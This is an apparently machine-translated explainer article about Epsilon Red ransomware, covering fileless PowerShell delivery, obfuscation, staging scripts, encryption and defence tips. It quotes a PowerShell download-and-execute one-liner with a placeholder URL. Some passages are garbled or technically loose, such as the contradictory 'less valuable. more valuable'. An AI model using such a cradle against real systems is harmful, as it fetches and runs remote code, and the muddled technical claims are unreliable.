What is Epsilon Red Ransomware?

Named after a little-known villain in the Marvel comics, Epsilon Red was recently discovered by a cybersecurity company called Sophos. Since its discovery, ransomware has attacked numerous organizations around the world.

Fileless ransomware 'hides' PowerShell

Fileless ransomware is a form of malware that executes by accompanying legitimate software. Fileless malware based on PowerShell uses PowerShell's ability to load directly into the device's memory. This feature helps protect malware in PowerShell scripts from detection.

In a typical scenario, when a script executes, it must first be written to the device's drive. This allows endpoint security solutions to detect scripts. Because PowerShell is excluded from standard script execution processes, it can bypass endpoint security. In addition, using the bypass parameter in a PowerShell script allows an attacker to circumvent network script restrictions.

Examples of PowerShell bypass parameters are:

powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString('url'))

As you can see, designing the PowerShell bypass parameters is relatively easy.

In response to this, Microsoft released a patch to address the PowerShell-related remote malware execution vulnerability. However, patches are only effective when they are used. Many organizations have relaxed their patching standards, making their environments vulnerable to attacks. Epsilon Red's design is to take advantage of that level of vulnerability.

Epsilon Red's dual usefulness

Since Epsilon Red is most effective against unpatched Microsoft servers, the malware can be used as both a ransomware and awareness tool. Whether or not Epsilon succeeds in an environment gives an attacker more insight into the security capabilities of the target.

If Epsilon is successful in accessing Microsoft Exchange Server, it indicates that the organization is not following common patching security best practices. For an attacker, this shows how easily the rest of the target's environment can be infiltrated by Epsilon.

Epsilon Red uses the Obfuscation technique to hide its payload. Obfuscation makes code unreadable and is used in PowerShell malware to avoid the high readability of PowerShell scripts. With obfuscation, PowerShell alias cmdlets are used to make it difficult for anti-virus software to identify malicious scripts in PowerShell logs.

What is Epsilon Red Ransomware? Picture 1

However, obfuscated PowerShell scripts can still be identified. A common sign of an impending PowerShell Script attack is the creation of a WebClient object. An attacker would create a WebClient object in the PowerShell code to establish an external connection to a remote URL containing malicious code.

If an organization is hacked, it's very unlikely that the organization has enough security measures in place to detect obfuscated PowerShell scripts. Conversely, if Epsilon Red fails to penetrate the server, this tells the attacker that the target's network can decode the PowerShell malware quickly, making the attack less valuable. more valuable.

Epsilon Red's Cyber Invasion

The function of Epsilon Red is very simple. The software uses a series of Powershell scripts to infiltrate the servers. These PowerShell scripts are numbered from 1.ps1 to 12.ps1. The design of each PowerShell script is to prepare a target server for the final payload.

All PowerShell scripts in Epsilon Red have a purpose. One of the PowerShell scripts in Epsilon Red is designed to resolve the target's network firewall rules. Another piece of software in this series designed to uninstall a target's anti-virus software.

As you might have guessed, these scripts work in sync to ensure that once the payload is delivered, the target won't be able to quickly stop its progress.

Transmission of payload

Once Epsilon's PowerShell scripts have paved the way for its final payload, it will be distributed as an extension, Red.exe. When it enters the server, Red.exe will scan the server's files and generate a list of directory paths for each file it detects. After creating the list, child processes are created from the main malware file for each directory path in the list. Then, each ransomware subfile encrypts a directory path from the list file.

After all the folder paths in Epson's list have been encrypted, a .txt file will be left to notify the target and state the attacker's request. In addition, all accessible network nodes connected to the compromised host will then be compromised and the potential for malware to enter the network may increase.

Who is behind Epsilon Red?

What is Epsilon Red Ransomware? Picture 2

The identity of the attackers behind Epsilon Red is still unknown. However, some clues suggest the origin of the attackers. The first clue is the name of the malware. Epsilon Red is an X-Men villain with a Russian origin story.

The second clue is in the ransom note for the .txt file that the code left behind. It is similar to the note left by a ransomware gang called REvil. However, this similarity does not indicate that the attackers were members of this gang. REvil operates a RaaS (Ransomware as a service) operation in which affiliates pay REvil for access to its malware.

Protect yourself from Epsilon Red

So far, Epsilon Red has successfully infiltrated unpatched servers. This means that one of the best defenses against Epsilon Red and similar ransomware malware, is to ensure that your environment is properly managed. In addition, having a security solution that can quickly decrypt PowerShell scripts will be a useful addition to your environment.

Micah Soto

Update 28 June 2021

You should read it

May be interested

Why is Ransomware the perfect hack?
it is difficult to get an accurate number of cyber attacks, but the available data on ransomware give a poor picture.
Learn about Ransomware: 6 ransomware on computers
what is ransomware? are there any other ransomware? how does ransomware attack computers and demand ransom from users?
Detecting two unusual versions of ransomware, shows that the world of ransomware has become diversified
international cybersecurity researchers recently found two completely new types of ransomware that are quite strange. they carry very different and rarely recorded features, which are the alarm bells, showing that the world of ransomware has become diverse.
What is Fargo Ransomware? How to avoid?
ransomware is a major threat to the digital world, made even more so by cybercriminals coming up with various strategies. one way to solve the problem is to learn how these attacks work.
Warning: Quantum Ransomware is being rapidly deployed in lightning attacks
ransomware (ransomware) is probably not a new concept for most computer users. however, quantum ransomware is a term not everyone has heard of.
Ransomware can attack the CPU, not just the operating system: How to prevent it?
ransomware is a serious problem in its current state and is only going to get worse. any security programs and measures will be rendered useless when ransomware attacks the cpu.
Theory - Ransomware part 2
in the previous section of the article, tipsmake.com introduced you to some basic information about ransomware, cryptolocker ... as well as how to operate, tap money of these fake software, spies. and this time, we will continue to dive into ransomware as well as variants and relatives in the vast cryptolocker family.
How to remove Moba ransomware from the operating system
moba is a malware, belonging to the djvu ransomware family. these malware-infected systems are encrypted data and receive a ransom request to obtain decryption tools / software.
STOP - Ransomware is the most active in the Internet but rarely talked about
the fight against stop ransomware in particular and other ransomware strains in general is still very difficult and no appointment of an end date.
PureLocker - a very 'weird' ransomware strain that can encrypt servers
purelocker: new ransomware strain with an unusual attack mechanism